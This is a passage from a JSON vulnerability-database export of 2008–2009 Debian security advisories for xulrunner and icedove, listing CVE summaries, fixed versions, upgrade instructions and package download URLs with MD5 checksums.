http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614h-0etch1_powerpc.deb\n Size/MD5 checksum: 53822 06e6021788dfa6ed42f73c42dc42d4c6\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614h-0etch1_powerpc.deb\n Size/MD5 checksum: 148102 9ee04ff3dbad84bebf8536adf942da51\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614h-0etch1_powerpc.deb\n Size/MD5 checksum: 279498 2a91ba4052440b688a084142034094b2\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614h-0etch1_powerpc.deb\n Size/MD5 checksum: 350088 2cdf2cc81b27d7ecab9c8045f9fa3f4c\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614h-0etch1_powerpc.deb\n Size/MD5 checksum: 774852 68f4364621232a4ccaf379739fe90844\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614h-0etch1_powerpc.deb\n Size/MD5 checksum: 640770 caf3b284405fe5c5c630aa3079b03a98\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614h-0etch1_powerpc.deb\n Size/MD5 checksum: 65030 1fb0c63b382b718542a93f6a5044c5dd\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614h-0etch1_powerpc.deb\n Size/MD5 checksum: 6111652 8084da84956a7dd10fb41a748571d1ce\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614h-0etch1_powerpc.deb\n Size/MD5 checksum: 311138 dd2cdb789b213198e2d07793ff6cda7d\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614h-0etch1_s390.deb\n Size/MD5 checksum: 372540 2a5ba267a8fe0873efd38cd4b7901cc6\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614h-0etch1_s390.deb\n Size/MD5 checksum: 282950 45ee96102546cd3721b3035fa66625d5\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614h-0etch1_s390.deb\n Size/MD5 checksum: 127476 c84ebe0a16a997feec58a7e4b8cb680e\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614h-0etch1_s390.deb\n Size/MD5 checksum: 6815988 904ffedb7cf2d3951fa3ba419db97bf8\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614h-0etch1_s390.deb\n Size/MD5 checksum: 688656 68fe7ceca84ad73d3af368cafcc8bb8d\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614h-0etch1_s390.deb\n Size/MD5 checksum: 3182688 e31c62d66bbc8c56803ad26bebdd759b\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614h-0etch1_s390.deb\n Size/MD5 checksum: 54072 143164871ff9749b6b6b4430cb32041b\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614h-0etch1_s390.deb\n Size/MD5 checksum: 756986 e369095cb45670013a7842c16e4b705d\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614h-0etch1_s390.deb\n Size/MD5 checksum: 69980 9d100c8a6ce21bf7072068084fb0d686\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614h-0etch1_s390.deb\n Size/MD5 checksum: 306772 7d5c5de6d3b220c4ed01f0f41fdee5bc\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614h-0etch1_s390.deb\n Size/MD5 checksum: 899720 3ac2e0a53da7a24c693705e38222063e\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614h-0etch1_s390.deb\n Size/MD5 checksum: 160818 24d85411a0b362051bf4a01071b62fba\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614h-0etch1_s390.deb\n Size/MD5 checksum: 46082350 b519a68a5f31a04f0f5e236845487bde\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614h-0etch1_sparc.deb\n Size/MD5 checksum: 719922 5bc9efc37cef094718adb36d5a016179\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614h-0etch1_sparc.deb\n Size/MD5 checksum: 676172 b0241dcaf3f7153dc9145a9c5babe787\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614h-0etch1_sparc.deb\n Size/MD5 checksum: 63314 4e65fa183e0e12f543d0eb669c6d670d\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614h-0etch1_sparc.deb\n Size/MD5 checksum: 51986 303f9de96490f0633aab95306fe30f05\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614h-0etch1_sparc.deb\n Size/MD5 checksum: 586488 6236e767259e06e3d3b4c062ee6362a2\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614h-0etch1_sparc.deb\n Size/MD5 checksum: 44786670 07e5e02fced64c2303043cffa255a4ee\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614h-0etch1_sparc.deb\n Size/MD5 checksum: 5691050 3f4e9e5e4feff6a386094101820c9f11\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614h-0etch1_sparc.deb\n Size/MD5 checksum: 323786 ec3a7690b2e154e51132d1983a72be3b\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614h-0etch1_sparc.deb\n Size/MD5 checksum: 2854664 214407a606e9b94ab300ea306d1c0e18\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614h-0etch1_sparc.deb\n Size/MD5 checksum: 136908 be6e397388eb412bcbf9ec6a014b00f5\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614h-0etch1_sparc.deb\n Size/MD5 checksum: 118720 346aa123c24a426716a1576c3c285dc6\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614h-0etch1_sparc.deb\n Size/MD5 checksum: 284372 63ba1195ae71a92c6b780004c0c7e2da\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614h-0etch1_sparc.deb\n Size/MD5 checksum: 261348 690d1985e4d4cd1c5b076e76af55ac84\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 1, "reporter": "Debian", "published": "2008-11-23T20:30:10", "title": "[SECURITY] [DSA 1669-1] New xulrunner packages fix several vulnerabilities", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:13:59", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-5012", "CVE-2008-5013", "CVE-2008-3836", "CVE-2008-4066", "CVE-2008-5018", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-5023", "CVE-2008-3837", "CVE-2008-5021", "CVE-2008-5017", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-5014", "CVE-2008-4058", "CVE-2008-5022", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-0017", "CVE-2008-5024", "CVE-2008-4065", "CVE-2008-4582"], "modified": "2008-11-23T20:30:10", "id": "DEBIAN:DSA-1669-1:1E759", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00261.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:15:01", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "4", "packageVersion": "1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1", "arch": "all", "packageFilename": "thunderbird-dbg_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb", "packageName": "thunderbird-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1", "arch": "all", "packageFilename": "icedove-dev_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb", "packageName": "icedove-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1", "arch": "all", "packageFilename": "mozilla-thunderbird-typeaheadfind_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb", "packageName": "mozilla-thunderbird-typeaheadfind", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1", "arch": "all", "packageFilename": "icedove-dbg_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb", "packageName": "icedove-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1", "arch": "all", "packageFilename": "thunderbird-inspector_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb", "packageName": "thunderbird-inspector", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1", "arch": "all", "packageFilename": "mozilla-thunderbird-dev_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb", "packageName": "mozilla-thunderbird-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1", "arch": "all", "packageFilename": "icedove-gnome-support_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb", "packageName": "icedove-gnome-support", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1", "arch": "all", "packageFilename": "thunderbird-typeaheadfind_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb", "packageName": "thunderbird-typeaheadfind", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1", "arch": "all", "packageFilename": "mozilla-thunderbird-inspector_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb", "packageName": "mozilla-thunderbird-inspector", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1", "arch": "all", "packageFilename": "mozilla-thunderbird_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb", "packageName": "mozilla-thunderbird", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1", "arch": "all", "packageFilename": "thunderbird_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1", "arch": "all", "packageFilename": "thunderbird-gnome-support_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb", "packageName": "thunderbird-gnome-support", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1", "arch": "all", "packageFilename": "icedove_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb", "packageName": "icedove", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1", "arch": "all", "packageFilename": "thunderbird-dev_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb", "packageName": "thunderbird-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1", "arch": "all", "packageFilename": "icedove-typeaheadfind_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb", "packageName": "icedove-typeaheadfind", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1", "arch": "all", "packageFilename": "icedove-inspector_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb", "packageName": "icedove-inspector", "operator": "lt"}], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1696-1 security@debian.org\nhttp://www.debian.org/security/ Steffen Joeris\nJanuary 07, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : icedove\nVulnerability : several vulnerabilities\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2008-0016 CVE-2008-1380 CVE-2008-3835 CVE-2008-4058\nCVE-2008-4059 CVE-2008-4060 CVE-2008-4061 CVE-2008-4062 CVE-2008-4065 CVE-2008-4067\nCVE-2008-4068 CVE-2008-4070 CVE-2008-5012 CVE-2008-5014 CVE-2008-5017 CVE-2008-5018\nCVE-2008-5021 CVE-2008-5022 CVE-2008-5024 CVE-2008-5500 CVE-2008-5503 CVE-2008-5506\nCVE-2008-5507 CVE-2008-5508 CVE-2008-5511 CVE-2008-5512\n\nSeveral remote vulnerabilities have been discovered in the Icedove\nmail client, an unbranded version of the Thunderbird mail client. The\nCommon Vulnerabilities and Exposures project identifies the following\nproblems:\n\nCVE-2008-0016\n\n Justin Schuh, Tom Cross and Peter Williams discovered a buffer\n overflow in the parser for UTF-8 URLs, which may lead to the execution\n of arbitrary code. (MFSA 2008-37)\n\nCVE-2008-1380\n\n It was discovered that crashes in the Javascript engine could\n potentially lead to the execution of arbitrary code. (MFSA 2008-20) \n\nCVE-2008-3835\n\n "moz_bug_r_a4" discovered that the same-origin check in\n nsXMLDocument::OnChannelRedirect() could be bypassed. (MFSA 2008-38)\n\nCVE-2008-4058\n\n "moz_bug_r_a4" discovered a vulnerability which can result in\n Chrome privilege escalation through XPCNativeWrappers. (MFSA 2008-41)\n\nCVE-2008-4059\n\n "moz_bug_r_a4" discovered a vulnerability which can result in\n Chrome privilege escalation through XPCNativeWrappers. (MFSA 2008-41)\n\nCVE-2008-4060\n\n Olli Pettay and "moz_bug_r_a4" discovered a Chrome privilege\n escalation vulnerability in XSLT handling. (MFSA 2008-41)\n\nCVE-2008-4061\n\n Jesse Ruderman discovered a crash in the layout engine, which might\n allow the execution of arbitrary code. (MFSA 2008-42)\n\nCVE-2008-4062\n\n Igor Bukanov, Philip Taylor, Georgi Guninski and Antoine Labour\n discovered crashes in the Javascript engine, which might allow the\n execution of arbitrary code. (MFSA 2008-42)\n\nCVE-2008-4065\n\n Dave Reed discovered that some Unicode byte order marks are\n stripped from Javascript code before execution, which can result in\n code being executed, which were otherwise part of a quoted string.\n (MFSA 2008-43)\n\nCVE-2008-4067\n\n It was discovered that a directory traversal allows attackers to\n read arbitrary files via a certain characters. (MFSA 2008-44)\n\nCVE-2008-4068\n\n It was discovered that a directory traversal allows attackers to\n bypass security restrictions and obtain sensitive information.\n (MFSA 2008-44)\n\nCVE-2008-4070\n\n It was discovered that a buffer overflow could be triggered via a\n long header in a news article, which could lead to arbitrary code\n execution. (MFSA 2008-46)\n\nCVE-2008-4582\n\n Liu Die Yu and Boris Zbarsky discovered an information leak through\n local shortcut files. (MFSA 2008-47 MFSA 2008-59)\n\nCVE-2008-5012\n\n Georgi Guninski, Michal Zalewski and Chris Evan discovered that\n the canvas element could be used to bypass same-origin\n restrictions. (MFSA 2008-48)\n\nCVE-2008-5014\n\n Jesse Ruderman discovered that a programming error in the\n window.__proto__.__proto__ object could lead to arbitrary code\n execution. (MFSA 2008-50)\n\nCVE-2008-5017\n\n It was discovered that crashes in the layout engine could lead to\n arbitrary code execution. (MFSA 2008-52)\n\nCVE-2008-5018\n\n It was discovered that crashes in the Javascript engine could lead to\n arbitrary code execution. (MFSA 2008-52)\n\nCVE-2008-5021\n\n It was discovered that a crash in the nsFrameManager might lead to\n the execution of arbitrary code. (MFSA 2008-55)\n\nCVE-2008-5022\n\n "moz_bug_r_a4" discovered that the same-origin check in\n nsXMLHttpRequest::NotifyEventListeners() could be bypassed.\n (MFSA 2008-56)\n\nCVE-2008-5024\n\n Chris Evans discovered that quote characters were improperly\n escaped in the default namespace of E4X documents. (MFSA 2008-58)\n\nCVE-2008-5500\n\n Jesse Ruderman discovered that the layout engine is vulnerable to\n DoS attacks that might trigger memory corruption and an integer\n overflow. (MFSA 2008-60)\n\nCVE-2008-5503\n\n Boris Zbarsky discovered that an information disclosure attack could\n be performed via XBL bindings. (MFSA 2008-61)\n\nCVE-2008-5506\n\n Marius Schilder discovered that it is possible to obtain sensible\n data via a XMLHttpRequest. (MFSA 2008-64)\n\nCVE-2008-5507\n\n Chris Evans discovered that it is possible to obtain sensible data\n via a JavaScript URL. (MFSA 2008-65)\n\nCVE-2008-5508\n\n Chip Salzenberg discovered possible phishing attacks via URLs with\n leading whitespaces or control characters. (MFSA 2008-66)\n\nCVE-2008-5511\n\n It was discovered that it is possible to perform cross-site scripting\n attacks via an XBL binding to an "unloaded document." (MFSA 2008-68)\n\nCVE-2008-5512\n\n It was discovered that it is possible to run arbitrary JavaScript\n with chrome privileges via unknown vectors. (MFSA 2008-68)\n\n\nFor the stable distribution (etch) these problems have been fixed in\nversion 1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1. Packages for\ns390 will be provided later.\n\nFor the upcoming stable distribution (lenny) these problems will be\nfixed soon.\n\nFor the unstable (sid) distribution these problems have been fixed in\nversion 2.0.0.19-1.\n\nWe recommend that you upgrade your icedove packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/i/icedove/icedove_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1.diff.gz\n Size/MD5 checksum: 632912 934c1af8ef52f687bd76100e038f031e\n http://security.debian.org/pool/updates/main/i/icedove/icedove_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i.orig.tar.gz\n Size/MD5 checksum: 35464904 bc7d4a8ac66249e890cc6b8053e1c403\n http://security.debian.org/pool/updates/main/i/icedove/icedove_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1.dsc\n Size/MD5 checksum: 1352 50f9d989748dcdc3b4fbe3dfe5c511e0\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/i/icedove/mozilla-thunderbird-typeaheadfind_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb\n Size/MD5 checksum: 30358 bda7c5e419dc5d8a9bce681f985b7b54\n http://security.debian.org/pool/updates/main/i/icedove/mozilla-thunderbird-dev_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb\n Size/MD5 checksum: 30344 440f59303f23a8b51555ec44536bc610\n http://security.debian.org/pool/updates/main/i/icedove/thunderbird-gnome-support_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb\n Size/MD5 checksum: 30344 85cca8031c7e802bbe8da34c57f4f49e\n http://security.debian.org/pool/updates/main/i/icedove/mozilla-thunderbird_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb\n Size/MD5 checksum: 30332 1d7b977f1f636a6119fecbaa5209b123\n http://security.debian.org/pool/updates/main/i/icedove/mozilla-thunderbird-inspector_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb\n Size/MD5 checksum: 30352 ac038bd3bfa58b2bd8de442a71e6e244\n http://security.debian.org/pool/updates/main/i/icedove/thunderbird-typeaheadfind_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb\n Size/MD5 checksum: 30352 43ad195fe32dc2fb2e94513fbf91a77c\n http://security.debian.org/pool/updates/main/i/icedove/thunderbird_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb\n Size/MD5 checksum: 30312 cbe2956ce57f0d8c4c8ff97ab3e2b73e\n http://security.debian.org/pool/updates/main/i/icedove/thunderbird-dbg_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb\n Size/MD5 checksum: 30324 6a39034c09e4126bb21cdc23c2487939\n http://security.debian.org/pool/updates/main/i/icedove/thunderbird-dev_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb\n Size/MD5 checksum: 30330 a16f184ecc39515f32fa6083b617641b\n http://security.debian.org/pool/updates/main/i/icedove/thunderbird-inspector_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_all.deb\n Size/MD5 checksum: 30338 242b59c55d9dee9589bb59fbd6658dc6\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_alpha.deb\n Size/MD5 checksum: 3962856 19a9dc3a453f2ca162e6e5bba2c689b6\n http://security.debian.org/pool/updates/main/i/icedove/icedove_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_alpha.deb\n Size/MD5 checksum: 13483784 7fcca7955d98bb3a15f6ec99d6639771\n http://security.debian.org/pool/updates/main/i/icedove/icedove-inspector_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_alpha.deb\n Size/MD5 checksum: 200634 057601dd1afc618d5f13e42c085f86c5\n http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_alpha.deb\n Size/MD5 checksum: 54840 c88c725218fc24b4a0b3190af5ac5a65\n http://security.debian.org/pool/updates/main/i/icedove/icedove-typeaheadfind_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_alpha.deb\n Size/MD5 checksum: 65550 40bedd8656c7957486f18aac306f7d12\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_alpha.deb\n Size/MD5 checksum: 52488200 37055190c86d3ac57eec835a839bc419\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/i/icedove/icedove-typeaheadfind_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_amd64.deb\n Size/MD5 checksum: 62776 8d90b71b18c7d4b1d7e810f935d54e8d\n http://security.debian.org/pool/updates/main/i/icedove/icedove-inspector_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_amd64.deb\n Size/MD5 checksum: 197798 3b30dc78666876c8d0bb7b4787fdd8ca\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_amd64.deb\n Size/MD5 checksum: 3953624 6475fbe0b2b1c80b09028089ba67221d\n http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_amd64.deb\n Size/MD5 checksum: 53318 b9ec720b8da400758255f239813c20aa\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_amd64.deb\n Size/MD5 checksum: 51569938 8f68e2681ee04a4db5f91ab45b5f86e3\n http://security.debian.org/pool/updates/main/i/icedove/icedove_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_amd64.deb\n Size/MD5 checksum: 12217532 43120cb3e4a16da07e47876b71cf55e3\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_arm.deb\n Size/MD5 checksum: 3926916 2471690066542ca1e81b565feeed8e70\n http://security.debian.org/pool/updates/main/i/icedove/icedove_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_arm.deb\n Size/MD5 checksum: 10910920 b80811bcd6f906f9464be3164efaddf6\n http://security.debian.org/pool/updates/main/i/icedove/icedove-typeaheadfind_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_arm.deb\n Size/MD5 checksum: 60542 f12328fb2be467a5ab8c664df5f166ec\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_arm.deb\n Size/MD5 checksum: 50937432 355819c441f0af0756534c1b1d6befd7\n http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_arm.deb\n Size/MD5 checksum: 48438 84bf5cd63df4c78e1f7f7a46459e3163\n http://security.debian.org/pool/updates/main/i/icedove/icedove-inspector_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_arm.deb\n Size/MD5 checksum: 191338 e0866c1938dd6cf6463a6b8c0ccc4789\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_hppa.deb\n Size/MD5 checksum: 52398756 9bfa968bcce1f1d84aead2c343d02433\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_hppa.deb\n Size/MD5 checksum: 3961020 8baebf6bcb9006393313f31a6bb02db0\n http://security.debian.org/pool/updates/main/i/icedove/icedove-inspector_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_hppa.deb\n Size/MD5 checksum: 202134 738c0a03afd26aa91c156d563d0de1cc\n http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_hppa.deb\n Size/MD5 checksum: 55074 fc4d7d7e32182f0f1861ae5d06540db2\n http://security.debian.org/pool/updates/main/i/icedove/icedove-typeaheadfind_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_hppa.deb\n Size/MD5 checksum: 67312 b5e4ae6d90452f2232a22161f8bb83da\n http://security.debian.org/pool/updates/main/i/icedove/icedove_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_hppa.deb\n Size/MD5 checksum: 13655932 a02bb8a7403602059fedafe832531844\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/i/icedove/icedove_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_i386.deb\n Size/MD5 checksum: 10950918 c972632df916e3304ae1657a2b301fdc\n http://security.debian.org/pool/updates/main/i/icedove/icedove-inspector_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_i386.deb\n Size/MD5 checksum: 192848 1fcb52f25725a7c106e12f29ef73bbe8\n http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_i386.deb\n Size/MD5 checksum: 49112 1d2b378e81e1753d0428e220a24e16cc\n http://security.debian.org/pool/updates/main/i/icedove/icedove-typeaheadfind_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_i386.deb\n Size/MD5 checksum: 59682 3d90785a8070f5a1e5711a0981abf800\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_i386.deb\n Size/MD5 checksum: 3950506 8bfd66cc1708346cac4cb92b099925ec\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_i386.deb\n Size/MD5 checksum: 50850480 dbdbc7041b916f6e59dcac3ece619244\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_ia64.deb\n Size/MD5 checksum: 51880702 56164c298160502414409173c1f04e13\n http://security.debian.org/pool/updates/main/i/icedove/icedove-inspector_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_ia64.deb\n Size/MD5 checksum: 206440 13c15460c07d898861196040360a773b\n 